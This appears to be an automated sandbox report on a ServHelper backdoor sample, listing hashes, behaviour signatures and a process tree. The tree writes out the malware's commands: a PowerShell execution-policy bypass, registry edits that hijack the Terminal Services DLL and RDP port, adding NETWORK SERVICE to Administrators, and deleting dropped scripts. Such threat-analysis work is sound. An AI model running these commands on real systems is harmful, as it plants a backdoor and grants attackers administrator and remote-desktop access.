Analysis
-
max time kernel
84s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en -
submitted
14-09-2021 13:23
Static task
static1
Behavioral task
behavioral1
Sample
608b93e344bd3dbb09d0af9da6856061.exe
Resource
win7-en
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
608b93e344bd3dbb09d0af9da6856061.exe
Resource
win10-en
0 signatures
0 seconds
General
-
Target
608b93e344bd3dbb09d0af9da6856061.exe
-
Size
4.0MB
-
MD5
608b93e344bd3dbb09d0af9da6856061
-
SHA1
b7c8bd7bace350d3c9c054ebb58f25535d22ee95
-
SHA256
5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
-
SHA512
6e47bb4688737505af62a8c67cea4143185dc047340d8943d412b5274b229bd24628a31576a3250cdfb69b0b4fcfd74140fe83355f49527e7cf9f465c30ac131
Score
10/10
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3904 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 496 powershell.exe 496 powershell.exe 496 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3880 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 496 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 1612 wrote to memory of 3644 1612 608b93e344bd3dbb09d0af9da6856061.exe 69 PID 1612 wrote to memory of 3644 1612 608b93e344bd3dbb09d0af9da6856061.exe 69 PID 1612 wrote to memory of 3644 1612 608b93e344bd3dbb09d0af9da6856061.exe 69 PID 3644 wrote to memory of 3780 3644 powershell.exe 71 PID 3644 wrote to memory of 3780 3644 powershell.exe 71 PID 3644 wrote to memory of 3780 3644 powershell.exe 71 PID 3780 wrote to memory of 1644 3780 csc.exe 72 PID 3780 wrote to memory of 1644 3780 csc.exe 72 PID 3780 wrote to memory of 1644 3780 csc.exe 72 PID 3644 wrote to memory of 3880 3644 powershell.exe 73 PID 3644 wrote to memory of 3880 3644 powershell.exe 73 PID 3644 wrote to memory of 3880 3644 powershell.exe 73 PID 3644 wrote to memory of 2004 3644 powershell.exe 75 PID 3644 wrote to memory of 2004 3644 powershell.exe 75 PID 3644 wrote to memory of 2004 3644 powershell.exe 75 PID 3644 wrote to memory of 496 3644 powershell.exe 77 PID 3644 wrote to memory of 496 3644 powershell.exe 77 PID 3644 wrote to memory of 496 3644 powershell.exe 77 PID 3644 wrote to memory of 2312 3644 powershell.exe 79 PID 3644 wrote to memory of 2312 3644 powershell.exe 79 PID 3644 wrote to memory of 2312 3644 powershell.exe 79 PID 3644 wrote to memory of 3904 3644 powershell.exe 80 PID 3644 wrote to memory of 3904 3644 powershell.exe 80 PID 3644 wrote to memory of 3904 3644 powershell.exe 80 PID 3644 wrote to memory of 2552 3644 powershell.exe 81 PID 3644 wrote to memory of 2552 3644 powershell.exe 81 PID 3644 wrote to memory of 2552 3644 powershell.exe 81 PID 3644 wrote to memory of 1908 3644 powershell.exe 82 PID 3644 wrote to memory of 1908 3644 powershell.exe 82 PID 3644 wrote to memory of 1908 3644 powershell.exe 82 PID 1908 wrote to memory of 3652 1908 net.exe 83 PID 1908 wrote to memory of 3652 1908 net.exe 83 PID 1908 wrote to memory of 3652 1908 net.exe 83 PID 3644 wrote to memory of 2496 3644 powershell.exe 84 PID 3644 wrote to memory of 2496 3644 powershell.exe 84 PID 3644 wrote to memory of 2496 3644 powershell.exe 84 PID 2496 wrote to memory of 2620 2496 cmd.exe 85 PID 2496 wrote to memory of 2620 2496 cmd.exe 85 PID 2496 wrote to memory of 2620 2496 cmd.exe 85 PID 2620 wrote to memory of 3880 2620 cmd.exe 86 PID 2620 wrote to memory of 3880 2620 cmd.exe 86 PID 2620 wrote to memory of 3880 2620 cmd.exe 86 PID 3880 wrote to memory of 2892 3880 net.exe 87 PID 3880 wrote to memory of 2892 3880 net.exe 87 PID 3880 wrote to memory of 2892 3880 net.exe 87 PID 3644 wrote to memory of 3120 3644 powershell.exe 88 PID 3644 wrote to memory of 3120 3644 powershell.exe 88 PID 3644 wrote to memory of 3120 3644 powershell.exe 88 PID 3120 wrote to memory of 4024 3120 cmd.exe 89 PID 3120 wrote to memory of 4024 3120 cmd.exe 89 PID 3120 wrote to memory of 4024 3120 cmd.exe 89 PID 4024 wrote to memory of 4028 4024 cmd.exe 90 PID 4024 wrote to memory of 4028 4024 cmd.exe 90 PID 4024 wrote to memory of 4028 4024 cmd.exe 90 PID 4028 wrote to memory of 3328 4028 net.exe 91 PID 4028 wrote to memory of 3328 4028 net.exe 91 PID 4028 wrote to memory of 3328 4028 net.exe 91 PID 3644 wrote to memory of 1688 3644 powershell.exe 93 PID 3644 wrote to memory of 1688 3644 powershell.exe 93 PID 3644 wrote to memory of 1688 3644 powershell.exe 93 PID 3644 wrote to memory of 1828 3644 powershell.exe 94 PID 3644 wrote to memory of 1828 3644 powershell.exe 94 PID 3644 wrote to memory of 1828 3644 powershell.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pgf2ogpo\pgf2ogpo.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES555.tmp" "c:\Users\Admin\AppData\Local\Temp\pgf2ogpo\CSC7C53E3D0A2E74C089B16F1D5B1486D26.TMP"4⤵PID:1644
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2552
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2892
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3328
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1828
-
-